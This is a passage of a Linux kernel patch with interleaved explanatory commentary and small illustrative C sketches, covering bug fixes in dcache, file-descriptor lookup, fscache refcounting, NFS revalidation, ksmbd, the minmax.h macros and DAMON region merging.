++	/* Access d_parent under rcu as d_move() may change it. */
++	rcu_read_lock();
++	seq = read_seqbegin(&rename_lock);
++	subdir = d_ancestor(old_dentry, new_dentry);
++	 /* Try lockless once... */
++	if (read_seqretry(&rename_lock, seq)) {
++		/* ...else acquire lock for progress even on deep chains. */
++		read_seqlock_excl(&rename_lock);
++		subdir = d_ancestor(old_dentry, new_dentry);
++		read_sequnlock_excl(&rename_lock);
++	}
++	rcu_read_unlock();
++	return subdir;
+ }
+ EXPORT_SYMBOL(is_subdir);
+ 
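
The rewritten is_subdir() above is an instance of the "try lockless once, then take the lock" seqlock idiom: one optimistic pass under read_seqbegin()/read_seqretry(), and only on a detected race an exclusive-side fallback that is guaranteed to make progress even on deep, rename-heavy chains. A minimal sketch of the idiom with a demo seqlock (names hypothetical):

	/* Illustrative only -- not the dcache code itself. */
	#include <linux/compiler.h>
	#include <linux/seqlock.h>

	static DEFINE_SEQLOCK(demo_lock);

	static int demo_read(const int *shared)
	{
		unsigned int seq;
		int v;

		seq = read_seqbegin(&demo_lock);
		v = READ_ONCE(*shared);			/* one lockless attempt */
		if (read_seqretry(&demo_lock, seq)) {
			read_seqlock_excl(&demo_lock);	/* writer raced: serialize */
			v = *shared;
			read_sequnlock_excl(&demo_lock);
		}
		return v;
	}
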
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index abcded1acd194..4864863cd1298 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -763,6 +763,8 @@ int z_erofs_map_blocks_iter(struct inode *inode, struct erofs_map_blocks *map,
+ 
+ 	err = z_erofs_do_map_blocks(inode, map, flags);
+ out:
++	if (err)
++		map->m_llen = 0;
+ 	trace_z_erofs_map_blocks_iter_exit(inode, map, flags, err);
+ 
+ 	/* aggressively BUG_ON iff CONFIG_EROFS_FS_DEBUG is on */
+diff --git a/fs/file.c b/fs/file.c
+index dbca26ef7a01a..69386c2e37c50 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -481,12 +481,12 @@ struct files_struct init_files = {
+ 
+ static unsigned int find_next_fd(struct fdtable *fdt, unsigned int start)
+ {
+-	unsigned int maxfd = fdt->max_fds;
++	unsigned int maxfd = fdt->max_fds; /* always multiple of BITS_PER_LONG */
+ 	unsigned int maxbit = maxfd / BITS_PER_LONG;
+ 	unsigned int bitbit = start / BITS_PER_LONG;
+ 
+ 	bitbit = find_next_zero_bit(fdt->full_fds_bits, maxbit, bitbit) * BITS_PER_LONG;
+-	if (bitbit > maxfd)
++	if (bitbit >= maxfd)
+ 		return maxfd;
+ 	if (bitbit > start)
+ 		start = bitbit;
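
The one-character fix above closes an off-by-one: maxfd is always a multiple of BITS_PER_LONG, so when every full_fds_bits word is set, find_next_zero_bit() returns maxbit and bitbit lands exactly on maxfd; the old '>' test let that value through, and the subsequent open_fds scan started one word past the end of the bitmap. A user-space sketch of the boundary arithmetic:

	/* Illustrative only -- user-space analogue of the boundary case. */
	#include <stdio.h>

	#define BITS_PER_LONG 64

	int main(void)
	{
		unsigned int maxfd = 64;	/* always a multiple of BITS_PER_LONG */
		unsigned int maxbit = maxfd / BITS_PER_LONG;	/* 1 */
		unsigned int bitbit = maxbit * BITS_PER_LONG;	/* bitmap full: 64 */

		printf("old test clamps: %d\n", bitbit > maxfd);	/* 0 - bug */
		printf("new test clamps: %d\n", bitbit >= maxfd);	/* 1 - fixed */
		return 0;
	}
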
+diff --git a/fs/fscache/internal.h b/fs/fscache/internal.h
+index 1336f517e9b1a..4799a722bc285 100644
+--- a/fs/fscache/internal.h
++++ b/fs/fscache/internal.h
+@@ -145,8 +145,6 @@ extern const struct seq_operations fscache_volumes_seq_ops;
+ 
+ struct fscache_volume *fscache_get_volume(struct fscache_volume *volume,
+ 					  enum fscache_volume_trace where);
+-void fscache_put_volume(struct fscache_volume *volume,
+-			enum fscache_volume_trace where);
+ bool fscache_begin_volume_access(struct fscache_volume *volume,
+ 				 struct fscache_cookie *cookie,
+ 				 enum fscache_access_trace why);
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index cdf991bdd9def..cb75c07b5281a 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -27,6 +27,19 @@ struct fscache_volume *fscache_get_volume(struct fscache_volume *volume,
+ 	return volume;
+ }
+ 
++struct fscache_volume *fscache_try_get_volume(struct fscache_volume *volume,
++					      enum fscache_volume_trace where)
++{
++	int ref;
++
++	if (!__refcount_inc_not_zero(&volume->ref, &ref))
++		return NULL;
++
++	trace_fscache_volume(volume->debug_id, ref + 1, where);
++	return volume;
++}
++EXPORT_SYMBOL(fscache_try_get_volume);
++
+ static void fscache_see_volume(struct fscache_volume *volume,
+ 			       enum fscache_volume_trace where)
+ {
+@@ -420,6 +433,7 @@ void fscache_put_volume(struct fscache_volume *volume,
+ 			fscache_free_volume(volume);
+ 	}
+ }
++EXPORT_SYMBOL(fscache_put_volume);
+ 
+ /*
+  * Relinquish a volume representation cookie.
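
fscache_try_get_volume() above is the usual inc-not-zero "try get": the reference is taken only if the object is still live, which is what lets the withdraw paths pin a volume found on a list without racing against its final put. A minimal sketch of the idiom with a demo object (not the fscache types):

	/* Illustrative only -- demo refcounted object. */
	#include <linux/refcount.h>
	#include <linux/slab.h>

	struct obj {
		refcount_t ref;
	};

	static struct obj *obj_try_get(struct obj *o)
	{
		/* Fails once the count has hit zero, so an object already
		 * on its way to being freed can never be resurrected. */
		return refcount_inc_not_zero(&o->ref) ? o : NULL;
	}

	static void obj_put(struct obj *o)
	{
		if (refcount_dec_and_test(&o->ref))
			kfree(o);
	}
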
+diff --git a/fs/hfsplus/xattr.c b/fs/hfsplus/xattr.c
+index 49891b12c4156..2b0e0ba58139b 100644
+--- a/fs/hfsplus/xattr.c
++++ b/fs/hfsplus/xattr.c
+@@ -699,7 +699,7 @@ ssize_t hfsplus_listxattr(struct dentry *dentry, char *buffer, size_t size)
+ 		return err;
+ 	}
+ 
+-	strbuf = kmalloc(NLS_MAX_CHARSET_SIZE * HFSPLUS_ATTR_MAX_STRLEN +
++	strbuf = kzalloc(NLS_MAX_CHARSET_SIZE * HFSPLUS_ATTR_MAX_STRLEN +
+ 			XATTR_MAC_OSX_PREFIX_LEN + 1, GFP_KERNEL);
+ 	if (!strbuf) {
+ 		res = -ENOMEM;
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index dac1a5c110c0e..0f7dabc6c764e 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -97,6 +97,7 @@ static void iomap_adjust_read_range(struct inode *inode, struct folio *folio,
+ 	unsigned block_size = (1 << block_bits);
+ 	size_t poff = offset_in_folio(folio, *pos);
+ 	size_t plen = min_t(loff_t, folio_size(folio) - poff, length);
++	size_t orig_plen = plen;
+ 	unsigned first = poff >> block_bits;
+ 	unsigned last = (poff + plen - 1) >> block_bits;
+ 
+@@ -133,7 +134,7 @@ static void iomap_adjust_read_range(struct inode *inode, struct folio *folio,
+ 	 * handle both halves separately so that we properly zero data in the
+ 	 * page cache for blocks that are entirely outside of i_size.
+ 	 */
+-	if (orig_pos <= isize && orig_pos + length > isize) {
++	if (orig_pos <= isize && orig_pos + orig_plen > isize) {
+ 		unsigned end = offset_in_folio(folio, isize - 1) >> block_bits;
+ 
+ 		if (first <= end && last > end)
+diff --git a/fs/locks.c b/fs/locks.c
+index c23bcfe9b0fdd..5aa574fec3026 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2394,8 +2394,9 @@ int fcntl_setlk(unsigned int fd, struct file *filp, unsigned int cmd,
+ 	error = do_lock_file_wait(filp, cmd, file_lock);
+ 
+ 	/*
+-	 * Attempt to detect a close/fcntl race and recover by releasing the
+-	 * lock that was just acquired. There is no need to do that when we're
++	 * Detect close/fcntl races and recover by zapping all POSIX locks
++	 * associated with this file and our files_struct, just like on
++	 * filp_flush(). There is no need to do that when we're
+ 	 * unlocking though, or for OFD locks.
+ 	 */
+ 	if (!error && file_lock->fl_type != F_UNLCK &&
+@@ -2410,9 +2411,7 @@ int fcntl_setlk(unsigned int fd, struct file *filp, unsigned int cmd,
+ 		f = files_lookup_fd_locked(files, fd);
+ 		spin_unlock(&files->file_lock);
+ 		if (f != filp) {
+-			file_lock->fl_type = F_UNLCK;
+-			error = do_lock_file_wait(filp, cmd, file_lock);
+-			WARN_ON_ONCE(error);
++			locks_remove_posix(filp, files);
+ 			error = -EBADF;
+ 		}
+ 	}
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index a5a4d9422d6ed..70660ff248b79 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1615,7 +1615,16 @@ nfs_lookup_revalidate_done(struct inode *dir, struct dentry *dentry,
+ 	switch (error) {
+ 	case 1:
+ 		break;
+-	case 0:
++	case -ETIMEDOUT:
++		if (inode && (IS_ROOT(dentry) ||
++			      NFS_SERVER(inode)->flags & NFS_MOUNT_SOFTREVAL))
++			error = 1;
++		break;
++	case -ESTALE:
++	case -ENOENT:
++		error = 0;
++		fallthrough;
++	default:
+ 		/*
+ 		 * We can't d_drop the root of a disconnected tree:
+ 		 * its d_hash is on the s_anon list and d_drop() would hide
+@@ -1670,18 +1679,8 @@ static int nfs_lookup_revalidate_dentry(struct inode *dir,
+ 
+ 	dir_verifier = nfs_save_change_attribute(dir);
+ 	ret = NFS_PROTO(dir)->lookup(dir, dentry, fhandle, fattr);
+-	if (ret < 0) {
+-		switch (ret) {
+-		case -ESTALE:
+-		case -ENOENT:
+-			ret = 0;
+-			break;
+-		case -ETIMEDOUT:
+-			if (NFS_SERVER(inode)->flags & NFS_MOUNT_SOFTREVAL)
+-				ret = 1;
+-		}
++	if (ret < 0)
+ 		goto out;
+-	}
+ 
+ 	/* Request help from readdirplus */
+ 	nfs_lookup_advise_force_readdirplus(dir, flags);
+@@ -1725,7 +1724,7 @@ nfs_do_lookup_revalidate(struct inode *dir, struct dentry *dentry,
+ 			 unsigned int flags)
+ {
+ 	struct inode *inode;
+-	int error;
++	int error = 0;
+ 
+ 	nfs_inc_stats(dir, NFSIOS_DENTRYREVALIDATE);
+ 	inode = d_inode(dentry);
+@@ -1770,7 +1769,7 @@ nfs_do_lookup_revalidate(struct inode *dir, struct dentry *dentry,
+ out_bad:
+ 	if (flags & LOOKUP_RCU)
+ 		return -ECHILD;
+-	return nfs_lookup_revalidate_done(dir, dentry, inode, 0);
++	return nfs_lookup_revalidate_done(dir, dentry, inode, error);
+ }
+ 
+ static int
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index ec641a8f6604b..cc620fc7aaf7b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -6274,6 +6274,7 @@ nfs4_set_security_label(struct inode *inode, const void *buf, size_t buflen)
+ 	if (status == 0)
+ 		nfs_setsecurity(inode, fattr);
+ 
++	nfs_free_fattr(fattr);
+ 	return status;
+ }
+ #endif	/* CONFIG_NFS_V4_SECURITY_LABEL */
+diff --git a/fs/nfs/symlink.c b/fs/nfs/symlink.c
+index 0e27a2e4e68b8..13818129d268f 100644
+--- a/fs/nfs/symlink.c
++++ b/fs/nfs/symlink.c
+@@ -41,7 +41,7 @@ static int nfs_symlink_filler(struct file *file, struct folio *folio)
+ error:
+ 	folio_set_error(folio);
+ 	folio_unlock(folio);
+-	return -EIO;
++	return error;
+ }
+ 
+ static const char *nfs_get_link(struct dentry *dentry,
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 13d038a96a5c0..78340d904c7b9 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1397,7 +1397,7 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ 	target_tcon = tlink_tcon(smb_file_target->tlink);
+ 
+ 	if (src_tcon->ses != target_tcon->ses) {
+-		cifs_dbg(VFS, "source and target of copy not on same server\n");
++		cifs_dbg(FYI, "source and target of copy not on same server\n");
+ 		goto out;
+ 	}
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 25383b11d01b9..7d69a2a1d3ba4 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -905,6 +905,40 @@ struct smb2_query_directory_rsp {
+ 	__u8   Buffer[];
+ } __packed;
+ 
++/* DeviceType Flags */
++#define FILE_DEVICE_CD_ROM              0x00000002
++#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
++#define FILE_DEVICE_DFS                 0x00000006
++#define FILE_DEVICE_DISK                0x00000007
++#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
++#define FILE_DEVICE_FILE_SYSTEM         0x00000009
++#define FILE_DEVICE_NAMED_PIPE          0x00000011
++#define FILE_DEVICE_NETWORK             0x00000012
++#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
++#define FILE_DEVICE_NULL                0x00000015
++#define FILE_DEVICE_PARALLEL_PORT       0x00000016
++#define FILE_DEVICE_PRINTER             0x00000018
++#define FILE_DEVICE_SERIAL_PORT         0x0000001b
++#define FILE_DEVICE_STREAMS             0x0000001e
++#define FILE_DEVICE_TAPE                0x0000001f
++#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
++#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
++#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
++
++/* Device Characteristics */
++#define FILE_REMOVABLE_MEDIA			0x00000001
++#define FILE_READ_ONLY_DEVICE			0x00000002
++#define FILE_FLOPPY_DISKETTE			0x00000004
++#define FILE_WRITE_ONCE_MEDIA			0x00000008
++#define FILE_REMOTE_DEVICE			0x00000010
++#define FILE_DEVICE_IS_MOUNTED			0x00000020
++#define FILE_VIRTUAL_VOLUME			0x00000040
++#define FILE_DEVICE_SECURE_OPEN			0x00000100
++#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
++#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
++#define FILE_PORTABLE_DEVICE			0x00004000
++#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
++
+ /*
+  * Maximum number of iovs we need for a set-info request.
+  * The largest one is rename/hardlink
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6344bc81736c0..4ba6bf1535da1 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5048,8 +5048,13 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info = (struct filesystem_device_info *)rsp->Buffer;
+ 
+-		info->DeviceType = cpu_to_le32(stfs.f_type);
+-		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
++		info->DeviceType = cpu_to_le32(FILE_DEVICE_DISK);
++		info->DeviceCharacteristics =
++			cpu_to_le32(FILE_DEVICE_IS_MOUNTED);
++		if (!test_tree_conn_flag(work->tcon,
++					 KSMBD_TREE_CONN_FLAG_WRITABLE))
++			info->DeviceCharacteristics |=
++				cpu_to_le32(FILE_READ_ONLY_DEVICE);
+ 		rsp->OutputBufferLength = cpu_to_le32(8);
+ 		break;
+ 	}
+diff --git a/include/linux/fscache-cache.h b/include/linux/fscache-cache.h
+index a174cedf4d907..35e86d2f2887b 100644
+--- a/include/linux/fscache-cache.h
++++ b/include/linux/fscache-cache.h
+@@ -19,6 +19,7 @@
+ enum fscache_cache_trace;
+ enum fscache_cookie_trace;
+ enum fscache_access_trace;
++enum fscache_volume_trace;
+ 
+ enum fscache_cache_state {
+ 	FSCACHE_CACHE_IS_NOT_PRESENT,	/* No cache is present for this name */
+@@ -97,6 +98,11 @@ extern void fscache_withdraw_cookie(struct fscache_cookie *cookie);
+ 
+ extern void fscache_io_error(struct fscache_cache *cache);
+ 
++extern struct fscache_volume *
++fscache_try_get_volume(struct fscache_volume *volume,
++		       enum fscache_volume_trace where);
++extern void fscache_put_volume(struct fscache_volume *volume,
++			       enum fscache_volume_trace where);
+ extern void fscache_end_volume_access(struct fscache_volume *volume,
+ 				      struct fscache_cookie *cookie,
+ 				      enum fscache_access_trace why);
+diff --git a/include/linux/minmax.h b/include/linux/minmax.h
+index 1aea34b8f19bf..dd52969698f74 100644
+--- a/include/linux/minmax.h
++++ b/include/linux/minmax.h
+@@ -2,54 +2,93 @@
+ #ifndef _LINUX_MINMAX_H
+ #define _LINUX_MINMAX_H
+ 
++#include <linux/build_bug.h>
++#include <linux/compiler.h>
+ #include <linux/const.h>
+ 
+ /*
+  * min()/max()/clamp() macros must accomplish three things:
+  *
+- * - avoid multiple evaluations of the arguments (so side-effects like
++ * - Avoid multiple evaluations of the arguments (so side-effects like
+  *   "x++" happen only once) when non-constant.
+- * - perform strict type-checking (to generate warnings instead of
+- *   nasty runtime surprises). See the "unnecessary" pointer comparison
+- *   in __typecheck().
+- * - retain result as a constant expressions when called with only
++ * - Retain result as a constant expression when called with only
+  *   constant expressions (to avoid tripping VLA warnings in stack
+  *   allocation usage).
++ * - Perform signed v unsigned type-checking (to generate compile
++ *   errors instead of nasty runtime surprises).
++ * - Unsigned char/short are always promoted to signed int and can be
++ *   compared against signed or unsigned arguments.
++ * - Unsigned arguments can be compared against non-negative signed constants.
++ * - Comparison of a signed argument against an unsigned constant fails
++ *   even if the constant is below __INT_MAX__ and could be cast to int.
+  */
+ #define __typecheck(x, y) \
+ 	(!!(sizeof((typeof(x) *)1 == (typeof(y) *)1)))
+ 
+-#define __no_side_effects(x, y) \
+-		(__is_constexpr(x) && __is_constexpr(y))
++/* is_signed_type() isn't a constexpr for pointer types */
++#define __is_signed(x) 								\
++	__builtin_choose_expr(__is_constexpr(is_signed_type(typeof(x))),	\
++		is_signed_type(typeof(x)), 0)
+ 
+-#define __safe_cmp(x, y) \
+-		(__typecheck(x, y) && __no_side_effects(x, y))
++/* True for a non-negative signed int constant */
++#define __is_noneg_int(x)	\
++	(__builtin_choose_expr(__is_constexpr(x) && __is_signed(x), x, -1) >= 0)
+ 
+-#define __cmp(x, y, op)	((x) op (y) ? (x) : (y))
++#define __types_ok(x, y) 					\
++	(__is_signed(x) == __is_signed(y) ||			\
++		__is_signed((x) + 0) == __is_signed((y) + 0) ||	\
++		__is_noneg_int(x) || __is_noneg_int(y))
+ 
+-#define __cmp_once(x, y, unique_x, unique_y, op) ({	\
++#define __cmp_op_min <
++#define __cmp_op_max >
++
++#define __cmp(op, x, y)	((x) __cmp_op_##op (y) ? (x) : (y))
++
++#define __cmp_once(op, x, y, unique_x, unique_y) ({	\
+ 		typeof(x) unique_x = (x);		\
+ 		typeof(y) unique_y = (y);		\
+-		__cmp(unique_x, unique_y, op); })
+-
+-#define __careful_cmp(x, y, op) \
+-	__builtin_choose_expr(__safe_cmp(x, y), \
+-		__cmp(x, y, op), \
+-		__cmp_once(x, y, __UNIQUE_ID(__x), __UNIQUE_ID(__y), op))
++		static_assert(__types_ok(x, y),		\
++			#op "(" #x ", " #y ") signedness error, fix types or consider u" #op "() before " #op "_t()"); \
++		__cmp(op, unique_x, unique_y); })
++
++#define __careful_cmp(op, x, y)					\
++	__builtin_choose_expr(__is_constexpr((x) - (y)),	\
++		__cmp(op, x, y),				\
++		__cmp_once(op, x, y, __UNIQUE_ID(__x), __UNIQUE_ID(__y)))
++
++#define __clamp(val, lo, hi)	\
++	((val) >= (hi) ? (hi) : ((val) <= (lo) ? (lo) : (val)))
++
++#define __clamp_once(val, lo, hi, unique_val, unique_lo, unique_hi) ({	\
++		typeof(val) unique_val = (val);				\
++		typeof(lo) unique_lo = (lo);				\
++		typeof(hi) unique_hi = (hi);				\
++		static_assert(__builtin_choose_expr(__is_constexpr((lo) > (hi)), 	\
++				(lo) <= (hi), true),					\
++			"clamp() low limit " #lo " greater than high limit " #hi);	\
++		static_assert(__types_ok(val, lo), "clamp() 'lo' signedness error");	\
++		static_assert(__types_ok(val, hi), "clamp() 'hi' signedness error");	\
++		__clamp(unique_val, unique_lo, unique_hi); })
++
++#define __careful_clamp(val, lo, hi) ({					\
++	__builtin_choose_expr(__is_constexpr((val) - (lo) + (hi)),	\
++		__clamp(val, lo, hi),					\
++		__clamp_once(val, lo, hi, __UNIQUE_ID(__val),		\
++			     __UNIQUE_ID(__lo), __UNIQUE_ID(__hi))); })
+ 
+ /**
+  * min - return minimum of two values of the same or compatible types
+  * @x: first value
+  * @y: second value
+  */
+-#define min(x, y)	__careful_cmp(x, y, <)
++#define min(x, y)	__careful_cmp(min, x, y)
+ 
+ /**
+  * max - return maximum of two values of the same or compatible types
+  * @x: first value
+  * @y: second value
+  */
+-#define max(x, y)	__careful_cmp(x, y, >)
++#define max(x, y)	__careful_cmp(max, x, y)
+ 
+ /**
+  * umin - return minimum of two non-negative values
+@@ -58,7 +97,7 @@
+  * @y: second value
+  */
+ #define umin(x, y)	\
+-	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, <)
++	__careful_cmp(min, (x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull)
+ 
+ /**
+  * umax - return maximum of two non-negative values
+@@ -66,7 +105,7 @@
+  * @y: second value
+  */
+ #define umax(x, y)	\
+-	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, >)
++	__careful_cmp(max, (x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull)
+ 
+ /**
+  * min3 - return minimum of three values
+@@ -103,7 +142,7 @@
+  * This macro does strict typechecking of @lo/@hi to make sure they are of the
+  * same type as @val.  See the unnecessary pointer comparisons.
+  */
+-#define clamp(val, lo, hi) min((typeof(val))max(val, lo), hi)
++#define clamp(val, lo, hi) __careful_clamp(val, lo, hi)
+ 
+ /*
+  * ..and if you can't take the strict
+@@ -118,7 +157,7 @@
+  * @x: first value
+  * @y: second value
+  */
+-#define min_t(type, x, y)	__careful_cmp((type)(x), (type)(y), <)
++#define min_t(type, x, y)	__careful_cmp(min, (type)(x), (type)(y))
+ 
+ /**
+  * max_t - return maximum of two values, using the specified type
+@@ -126,7 +165,7 @@
+  * @x: first value
+  * @y: second value
+  */
+-#define max_t(type, x, y)	__careful_cmp((type)(x), (type)(y), >)
++#define max_t(type, x, y)	__careful_cmp(max, (type)(x), (type)(y))
+ 
+ /**
+  * clamp_t - return a value clamped to a given range using a given type
+@@ -138,7 +177,7 @@
+  * This macro does no typechecking and uses temporary variables of type
+  * @type to make all the comparisons.
+  */
+-#define clamp_t(type, val, lo, hi) min_t(type, max_t(type, val, lo), hi)
++#define clamp_t(type, val, lo, hi) __careful_clamp((type)(val), (type)(lo), (type)(hi))
+ 
+ /**
+  * clamp_val - return a value clamped to a given range using val's type
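
The static_assert() machinery above exists because C's usual arithmetic conversions make mixed-signedness comparisons silently wrong rather than ill-formed. A stand-alone sketch of the bug class the new __types_ok() check turns into a compile error:

	/* Illustrative only -- the hazard min()/max() now reject. */
	#include <stdio.h>

	int main(void)
	{
		int a = -1;
		unsigned int b = 1;

		/* 'a' is converted to unsigned int (UINT_MAX) before the
		 * comparison, so the naive minimum comes out as 1, not -1. */
		int m = (a < b) ? a : b;

		printf("%d\n", m);	/* prints 1; the mathematical min is -1 */
		return 0;
	}
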
+diff --git a/include/net/bluetooth/hci_sync.h b/include/net/bluetooth/hci_sync.h
+index 59d15b1a978ab..7accd5ff0760b 100644
+--- a/include/net/bluetooth/hci_sync.h
++++ b/include/net/bluetooth/hci_sync.h
+@@ -35,6 +35,8 @@ int __hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
+ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 			     const void *param, u8 event, u32 timeout,
+ 			     struct sock *sk);
++int hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
++			const void *param, u32 timeout);
+ 
+ void hci_cmd_sync_init(struct hci_dev *hdev);
+ void hci_cmd_sync_clear(struct hci_dev *hdev);
+diff --git a/include/sound/dmaengine_pcm.h b/include/sound/dmaengine_pcm.h
+index 2df54cf02cb33..74b8ef419d4fa 100644
+--- a/include/sound/dmaengine_pcm.h
++++ b/include/sound/dmaengine_pcm.h
+@@ -36,6 +36,7 @@ snd_pcm_uframes_t snd_dmaengine_pcm_pointer_no_residue(struct snd_pcm_substream
+ int snd_dmaengine_pcm_open(struct snd_pcm_substream *substream,
+ 	struct dma_chan *chan);
+ int snd_dmaengine_pcm_close(struct snd_pcm_substream *substream);
++int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream);
+ 
+ int snd_dmaengine_pcm_open_request_chan(struct snd_pcm_substream *substream,
+ 	dma_filter_fn filter_fn, void *filter_data);
+diff --git a/include/trace/events/fscache.h b/include/trace/events/fscache.h
+index a6190aa1b4060..f1a73aa83fbbf 100644
+--- a/include/trace/events/fscache.h
++++ b/include/trace/events/fscache.h
+@@ -35,12 +35,14 @@ enum fscache_volume_trace {
+ 	fscache_volume_get_cookie,
+ 	fscache_volume_get_create_work,
+ 	fscache_volume_get_hash_collision,
++	fscache_volume_get_withdraw,
+ 	fscache_volume_free,
+ 	fscache_volume_new_acquire,
+ 	fscache_volume_put_cookie,
+ 	fscache_volume_put_create_work,
+ 	fscache_volume_put_hash_collision,
+ 	fscache_volume_put_relinquish,
++	fscache_volume_put_withdraw,
+ 	fscache_volume_see_create_work,
+ 	fscache_volume_see_hash_wake,
+ 	fscache_volume_wait_create_work,
+@@ -120,12 +122,14 @@ enum fscache_access_trace {
+ 	EM(fscache_volume_get_cookie,		"GET cook ")		\
+ 	EM(fscache_volume_get_create_work,	"GET creat")		\
+ 	EM(fscache_volume_get_hash_collision,	"GET hcoll")		\
++	EM(fscache_volume_get_withdraw,		"GET withd")		\
+ 	EM(fscache_volume_free,			"FREE     ")		\
+ 	EM(fscache_volume_new_acquire,		"NEW acq  ")		\
+ 	EM(fscache_volume_put_cookie,		"PUT cook ")		\
+ 	EM(fscache_volume_put_create_work,	"PUT creat")		\
+ 	EM(fscache_volume_put_hash_collision,	"PUT hcoll")		\
+ 	EM(fscache_volume_put_relinquish,	"PUT relnq")		\
++	EM(fscache_volume_put_withdraw,		"PUT withd")		\
+ 	EM(fscache_volume_see_create_work,	"SEE creat")		\
+ 	EM(fscache_volume_see_hash_wake,	"SEE hwake")		\
+ 	E_(fscache_volume_wait_create_work,	"WAIT crea")
+diff --git a/mm/damon/core.c b/mm/damon/core.c
+index 5db9bec8ae67c..ab5c351b276ce 100644
+--- a/mm/damon/core.c
++++ b/mm/damon/core.c
+@@ -921,14 +921,31 @@ static void damon_merge_regions_of(struct damon_target *t, unsigned int thres,
+  * access frequencies are similar.  This is for minimizing the monitoring
+  * overhead under the dynamically changeable access pattern.  If a merge was
+  * unnecessarily made, later 'kdamond_split_regions()' will revert it.
++ *
++ * The total number of regions could be higher than the user-defined limit,
++ * max_nr_regions, in some cases.  For example, the user can update
++ * max_nr_regions to a number lower than the current number of regions
++ * while DAMON is running.  In such a case, repeat merging until the limit is
++ * met while increasing @threshold up to the possible maximum level.
+  */
+ static void kdamond_merge_regions(struct damon_ctx *c, unsigned int threshold,
+ 				  unsigned long sz_limit)
+ {
+ 	struct damon_target *t;
++	unsigned int nr_regions;
++	unsigned int max_thres;
+ 
+-	damon_for_each_target(t, c)
+-		damon_merge_regions_of(t, threshold, sz_limit);
++	max_thres = c->attrs.aggr_interval /
++		(c->attrs.sample_interval ?  c->attrs.sample_interval : 1);
++	do {
++		nr_regions = 0;
++		damon_for_each_target(t, c) {
++			damon_merge_regions_of(t, threshold, sz_limit);
++			nr_regions += damon_nr_regions(t);
++		}
++		threshold = max(1, threshold * 2);
++	} while (nr_regions > c->attrs.max_nr_regions &&
++			threshold / 2 < max_thres);
+ }
+ 
+ /*
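
The new loop doubles @threshold on every pass, so even if merging never reduces the region count it terminates once threshold/2 reaches max_thres -- on the order of log2(max_thres) passes at most. A small arithmetic sketch of that bound (the region-count condition is dropped to show the worst case):

	/* Illustrative only -- worst-case pass count of the doubling loop. */
	#include <stdio.h>

	int main(void)
	{
		unsigned int threshold = 1, max_thres = 5000, passes = 0;

		do {
			passes++;		/* one worst-case merge pass */
			threshold *= 2;
		} while (threshold / 2 < max_thres);

		printf("at most %u passes\n", passes);	/* 14 for max_thres = 5000 */
		return 0;
	}
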
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d6be3cb86598e..398a324657697 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -63,50 +63,6 @@ DEFINE_MUTEX(hci_cb_list_lock);
+ /* HCI ID Numbering */
+ static DEFINE_IDA(hci_index_ida);
+ 
+-static int hci_scan_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 scan = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, scan);
+-
+-	/* Inquiry and Page scans */
+-	hci_req_add(req, HCI_OP_WRITE_SCAN_ENABLE, 1, &scan);
+-	return 0;
+-}
+-
+-static int hci_auth_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 auth = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, auth);
+-
+-	/* Authentication */
+-	hci_req_add(req, HCI_OP_WRITE_AUTH_ENABLE, 1, &auth);
+-	return 0;
+-}
+-
+-static int hci_encrypt_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 encrypt = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, encrypt);
+-
+-	/* Encryption */
+-	hci_req_add(req, HCI_OP_WRITE_ENCRYPT_MODE, 1, &encrypt);
+-	return 0;
+-}
+-
+-static int hci_linkpol_req(struct hci_request *req, unsigned long opt)
+-{
